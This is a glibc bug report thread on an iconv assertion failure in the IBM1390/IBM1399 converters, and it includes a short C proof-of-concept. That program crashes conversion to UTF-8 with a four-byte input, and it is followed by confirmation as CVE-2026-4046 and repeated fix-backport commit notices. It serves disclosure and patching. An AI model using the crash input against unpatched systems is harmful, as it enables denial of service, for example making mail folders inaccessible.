For ibm1390 and ibm1399 encoding, which have "combined" attribute, may cause glibc to run into assertion error. Below I attach a poc to indicate the bug. Compile the unit file below and run it could see libc report a "../iconv/skeleton.c:594: gconv: Assertion `outbuf == outerr' failed." error. This is reported in Arch Linux, with glibc version 2.43+r5+g856c426a7534. I checked git log and the files, `iconvdata/ibm139{0,9}.{c,h}` stay unchanged since the very first patch. Here is what I found digging into the code: 1. SO COMBINED_WORD SI produced 2 internal word in outbuf in FROM_LOOP (SO and SI don't take space); 2. TO_LOOP consumed only one internal word (user outbuf is 4 bytes while 2 internal word converting to 2 utf-8 word require 8 bytes, outerr = outbuf + 4), outerr != outbuf, rerun needed; 3. In rerun, FROM_LOOP, with its `outend` restricted to outerr, caused combined word logic in LOOP to produce __GCONV_FULL_OUTPUT, and since combined word need atomically 2 internal words space, this is, 8 bytes, so outbuf is still outstart. So outbuf != outerr in this rerun, leading to assertion error. I wonder if this bug is a security bug (DoS) as for an application influenced by CVE-2024-2961, could also be influenced by this bug and be aborted by the assertion error. Since a combined word take 2 bytes in IBM139x, and can be expanded to 6 bytes in UTF-8, a malicious input could quickly take up space to trigger this bug. --- #define _GNU_SOURCE #include <errno.h> #include <iconv.h> #include <stdio.h> #include <stdlib.h> #include <string.h> static void die (const char *msg) { perror (msg); exit (1); } int main (int argc, char **argv) { setvbuf (stdout, NULL, _IONBF, 0); setvbuf (stderr, NULL, _IONBF, 0); const char *fromcode = argc >= 2 ? argv[1] : "IBM1390"; const char *tocode = argc >= 3 ? argv[2] : "UTF-8"; size_t outsz = argc >= 4 ? strtoul (argv[3], NULL, 0) : 4; /* IBM13xx combined-character example: 0xECB5 is a DBCS code that expands to two UCS-4 code points (U+304B U+309A). */ unsigned char input[] = { 0x0e, 0xec, 0xb5, 0x0f }; char *inptr = (char *) input; size_t inleft = sizeof (input); if (outsz == 0) outsz = 1; char *outbuf = malloc (outsz); if (!outbuf) die ("malloc"); memset (outbuf, 0x41, outsz); char *outptr = outbuf; size_t outleft = outsz; fprintf (stderr, "[*] iconv %s -> %s, in=0e(SO) ecb5 0f(SI), outsz=%zu\n", fromcode, tocode, outsz); iconv_t cd = iconv_open (tocode, fromcode); if (cd == (iconv_t) -1) die ("iconv_open"); errno = 0; long rc = iconv (cd, &inptr, &inleft, &outptr, &outleft); fprintf (stderr, "[*] iconv rc=%ld errno=%d (%s) inleft=%zu outleft=%zu\n", rc, errno, strerror (errno), inleft, outleft); fwrite(outbuf, 1, outsz - outleft, stdout); iconv_close (cd); free (outbuf); return 0; }
Yes, this is a security bug. Crashes in conversions to UTF-8 can make mail folders inaccessible in mutt, for example.
I think I have a fix for this, I just need to write a proper test case for it.
Fix with test case posted: [PATCH v2] Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) <https://inbox.sourceware.org/libc-alpha/lhucy0b6l2w.fsf@oldenburg.str.redhat.com/>
The master branch has been updated by Florian Weimer <fw@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=d6f08d1cf027f4eb2ba289a6cc66853722d4badc commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com>
Fixed for 2.44 so far.
The release/2.43/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=8362e8ce10b24068bacc19552c128dd10e082fd9 commit 8362e8ce10b24068bacc19552c128dd10e082fd9 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.42/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a commit f13c1bb0f97fbc12a6ba1ab5669ce561ea32b80a Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.41/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=61737f43b1f0d9f64a6f16649625476b70f9f4d3 commit 61737f43b1f0d9f64a6f16649625476b70f9f4d3 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.40/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=f82c16babf26c9d4c46399111ed8383d84c93d67 commit f82c16babf26c9d4c46399111ed8383d84c93d67 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.39/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=3e13579841429c56ad5497e6562c47067d8a53b0 commit 3e13579841429c56ad5497e6562c47067d8a53b0 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.38/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=55b2c0820d47b5983b4210f96991f87f11ebe7c5 commit 55b2c0820d47b5983b4210f96991f87f11ebe7c5 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.37/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ba37b7465239b5496b013dd5279b495a4a0f4eb5 commit ba37b7465239b5496b013dd5279b495a4a0f4eb5 Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)
The release/2.36/master branch has been updated by Aurelien Jarno <aurel32@sourceware.org>: https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=7abd383d439dc348419a9fd526d42ea4591e8aaf commit 7abd383d439dc348419a9fd526d42ea4591e8aaf Author: Florian Weimer <fweimer@redhat.com> Date: Thu Apr 16 19:13:43 2026 +0200 Use pending character state in IBM1390, IBM1399 character sets (CVE-2026-4046) Follow the example in iso-2022-jp-3.c and use the __count state variable to store the pending character. This avoids restarting the conversion if the output buffer ends between two 4-byte UCS-4 code points, so that the assert reported in the bug can no longer happen. Even though the fix is applied to ibm1364.c, the change is only effective for the two HAS_COMBINED codecs for IBM1390, IBM1399. The test case was mostly auto-generated using claude-4.6-opus-high-thinking, and composer-2-fast shows up in the log as well. During review, gpt-5.4-xhigh flagged that the original version of the test case was not exercising the new character flush logic. This fixes bug 33980. Assisted-by: LLM Reviewed-by: Carlos O'Donell <carlos@redhat.com> (cherry picked from commit d6f08d1cf027f4eb2ba289a6cc66853722d4badc)